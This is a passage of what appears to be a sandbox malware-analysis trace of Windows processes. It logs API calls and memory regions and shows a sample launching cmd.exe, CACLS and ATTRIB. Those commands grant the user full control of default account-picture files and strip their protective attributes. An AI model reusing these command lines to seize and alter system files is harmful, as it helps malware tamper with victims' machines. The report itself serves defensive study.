(in: lpConsoleTitle=0x30f504, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.421] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.421] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0185.421] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.421] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xffffffff [0185.421] GetLastError () returned 0x2 [0185.421] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xffffffff [0185.421] GetLastError () returned 0x2 [0185.421] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xae4d8 [0185.421] FindClose (in: hFindFile=0xae4d8 | out: hFindFile=0xae4d8) returned 1 [0185.422] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xffffffff [0185.422] GetLastError () returned 0x2 [0185.422] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xae4d8 [0185.422] FindClose (in: hFindFile=0xae4d8 | out: hFindFile=0xae4d8) returned 1 [0185.422] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0185.422] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0185.422] GetConsoleTitleW (in: lpConsoleTitle=0x30f298, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.422] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f120, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f1e8 | out: lpAttributeList=0x30f120, lpSize=0x30f1e8) returned 1 [0185.422] UpdateProcThreadAttribute (in: lpAttributeList=0x30f120, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f1e0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f120, lpPreviousValue=0x0) returned 1 [0185.422] GetStartupInfoW (in: lpStartupInfo=0x30f0dc | out: lpStartupInfo=0x30f0dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0185.422] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0185.422] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f17c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f1c8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"", lpProcessInformation=0x30f1c8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xecc, dwThreadId=0xf20)) returned 1 [0185.424] CloseHandle (hObject=0x50) returned 1 [0185.424] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0185.424] GetEnvironmentStringsW () returned 0xb2410* [0185.424] FreeEnvironmentStringsW (penv=0xb2410) returned 1 [0185.424] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0185.459] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x30f0bc | out: lpExitCode=0x30f0bc*=0x0) returned 1 [0185.459] CloseHandle (hObject=0x4c) returned 1 [0185.459] _vsnwprintf (in: _Buffer=0x30f204, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f0c8 | out: _Buffer="00000000") returned 8 [0185.459] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0185.459] GetEnvironmentStringsW () returned 0xb2410* [0185.459] FreeEnvironmentStringsW (penv=0xb2410) returned 1 [0185.459] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.459] GetEnvironmentStringsW () returned 0xb2410* [0185.459] FreeEnvironmentStringsW (penv=0xb2410) returned 1 [0185.459] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f120 | out: lpAttributeList=0x30f120) [0185.459] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.459] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0185.459] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.459] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0185.459] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.459] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0185.460] SetConsoleInputExeNameW () returned 0x1 [0185.460] GetConsoleOutputCP () returned 0x1b5 [0185.460] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.460] SetThreadUILanguage (LangId=0x0) returned 0x409 [0185.460] exit (_Code=0) Process: id = "371" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16ca0" os_pid = "0xe6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "370" os_parent_pid = "0xd44" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26396 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26397 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26398 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26399 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 26400 start_va = 0xbb0000 end_va = 0xbb8fff entry_point = 0xbb0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26401 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26402 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26403 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26404 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 26405 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26406 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26407 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26408 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 26409 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 26410 start_va = 0x1f0000 end_va = 0x256fff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26411 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26412 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26413 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26414 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26415 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26416 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26417 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 531 os_tid = 0x89c Thread: id = 532 os_tid = 0xde0 Process: id = "372" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c40" os_pid = "0xecc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "370" os_parent_pid = "0xd44" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26418 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26419 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26420 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26421 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 26422 start_va = 0xae0000 end_va = 0xae6fff entry_point = 0xae0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26423 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26424 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26425 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26426 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26427 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26428 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26429 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26430 start_va = 0x100000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 26431 start_va = 0x200000 end_va = 0x266fff entry_point = 0x200000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26432 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 26433 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26434 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26435 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26436 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26437 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26438 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26439 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26440 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26441 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26442 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26443 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26444 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26445 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 26446 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26447 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 533 os_tid = 0xf20 Process: id = "373" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0xf70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26448 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26449 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26450 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26451 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 26452 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26453 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26454 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26455 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26456 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 26457 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26458 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26459 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26460 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26461 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 26462 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 26463 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26464 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26465 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26466 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26467 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26468 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26469 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26470 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26471 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26472 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 26473 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26474 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26475 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 26476 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 26477 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 26478 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 26479 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 26480 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 26481 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 26482 start_va = 0x1320000 end_va = 0x15eefff entry_point = 0x1320000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 534 os_tid = 0xe70 [0185.506] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fac4 | out: lpSystemTimeAsFileTime=0x16fac4*(dwLowDateTime=0xa3786c80, dwHighDateTime=0x1d440a9)) [0185.506] GetCurrentProcessId () returned 0xf70 [0185.506] GetCurrentThreadId () returned 0xe70 [0185.506] GetTickCount () returned 0x3508f [0185.506] QueryPerformanceCounter (in: lpPerformanceCount=0x16fabc | out: lpPerformanceCount=0x16fabc*=24229533594) returned 1 [0185.507] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0185.507] __set_app_type (_Type=0x1) [0185.507] __p__fmode () returned 0x76b331f4 [0185.507] __p__commode () returned 0x76b331fc [0185.507] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0185.507] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0185.507] GetCurrentThreadId () returned 0xe70 [0185.507] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe70) returned 0x38 [0185.507] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0185.507] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0185.507] SetThreadUILanguage (LangId=0x0) returned 0x409 [0185.507] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0185.508] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fa54 | out: phkResult=0x16fa54*=0x0) returned 0x2 [0185.508] VirtualQuery (in: lpAddress=0x16fa8b, lpBuffer=0x16fa24, dwLength=0x1c | out: lpBuffer=0x16fa24*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.508] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fa24, dwLength=0x1c | out: lpBuffer=0x16fa24*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0185.508] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fa24, dwLength=0x1c | out: lpBuffer=0x16fa24*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0185.508] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fa24, dwLength=0x1c | out: lpBuffer=0x16fa24*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.508] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fa24, dwLength=0x1c | out: lpBuffer=0x16fa24*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0185.508] GetConsoleOutputCP () returned 0x1b5 [0185.508] GetCPInfo 